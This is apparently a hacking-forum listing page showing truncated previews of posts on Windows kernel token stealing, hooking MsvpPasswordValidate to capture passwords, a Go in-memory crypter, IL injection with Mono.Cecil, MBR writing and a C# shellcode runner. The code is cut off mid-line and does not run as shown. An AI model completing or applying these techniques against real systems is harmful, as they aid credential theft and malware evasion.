Author: SWaNk - Replies: 0 - Views: 988
Starting with Windows Kernel Exploitation
[Image: https://camo.githubusercontent.com/ab469...342e706e67]

Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver

Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token

Author: regasmx86 - Replies: 0 - Views: 1013
[Windows] Password Hooking with MsvpPasswordValidate

[code]#include "common.h"

MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
      PVOID LogonInformation,
      PULONG UserFlags,
      PUSER_SESSION_KEY UserSessionKey,
      PVOID LmSessionKey
return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
Author: TMZ - Replies: 0 - Views: 1194
Ezuri: Linux runtime crypter with memfd_create
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel version is >= 3.17 (relies on the memfd_create syscall).

package main

import (

func aesEnc(srcBytes []byte, key string, iv string) []byte {
block, err := aes.NewCipher([]byte(key))

encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
encrypted := make([]byte, len(srcBytes))
Author: TMZ - Replies: 1 - Views: 1074
Injection with Mono.Cecil
This may not be news for everyone but I find it interesting. Mono.Cecil is a impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:

A dummy C# application like the one below, compile it to get it’s executable file, that’s what we need:

using System;

namespace Dummy
class Program
public static v
Author: TMZ - Replies: 0 - Views: 897
MBR Dump With .NET
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.

using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;

namespace MBR
class MainClass

[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern uint SetFilePointer(
[In] SafeFileHandle hFile,
[In] int lDistanceToMove,
[Out] out int lpDis
Author: regasmx86 - Replies: 0 - Views: 1369
Shellcode execution with C#
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace Net_Shellcode_Execution
class Program
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static extern